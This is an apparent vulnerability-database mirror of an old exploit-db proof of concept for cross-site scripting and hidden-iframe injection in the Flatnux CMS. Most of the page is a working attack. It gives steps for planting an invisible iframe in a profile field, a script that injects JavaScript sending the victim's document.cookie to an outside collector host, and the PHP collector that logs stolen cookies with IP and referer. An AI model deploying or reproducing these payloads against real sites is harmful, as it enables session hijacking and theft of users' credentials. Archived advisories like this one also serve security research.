Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057403 漏洞类型
发布时间 2009-02-02 更新时间 2009-02-02
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7938
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* 
  - Flatnux-2009-01-27 XSS/Iframe injection p0c
  + 1] Create acount 
  + 1] Go to http://localhost/~flatnux/?mod=login&op=modprof&user=[username]
       - Set iframe in the Job fields       
         (Jobless l0l<iframe src=http://0xc00000fdh.boo.pl/flatnux_ost.php style="visibility:hidden;width:0px;height:0px"></iframe>) 
  + 3] Now m4k3 frieNdship witch Sheep

  Greetings : cOndemned , sid.psycho , wszyscy których ników nie umie wymówić :P 
              and Biggest 4 g0rion l0l

  "... droga jest ważniejsza od celu .... :P"
  http://www.wrzuta.pl/audio/iL4UkPk6YK/
  Alfons Luja 
*/       
            

<script type="text/javascript">
          path = "http://localhost/~flatnux/index.php?mod=02_Flatforum\"><script>location.href=\"http://0xc00000fdh.boo.pl/collector.php?kuka=\"%2Bdocument.cookie;<%2Fscript>";
          location.href =  path;
</script>


/*++++++++++++++++++collector.php++++++++++++++++++++++
<?php
  if(isset($_GET['kuka'])){
     $gethim = $_GET['kuka'];
     $data = "KUKI_GRABER:\n";
     $data.= date("dmY H:i:s")."\n";
     $data.= "REFERER: ".$_SERVER['HTTP_REFERER']."\n";
     $data.= "IP: ".$_SERVER['REMOTE_ADDR']."\n";
     $data.= "CIACHO: ".$gethim."\n";
     $hnd = fopen("KUKI_FLATNUX.TXT","a");
      if(!hnd) exit(666);
         flock($hnd,LOCK_EX);
         fwrite($hnd,$data);
         flock($hnd,LOCK_UN);
         fclose($hnd);
  }
?>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/

# milw0rm.com [2009-02-02]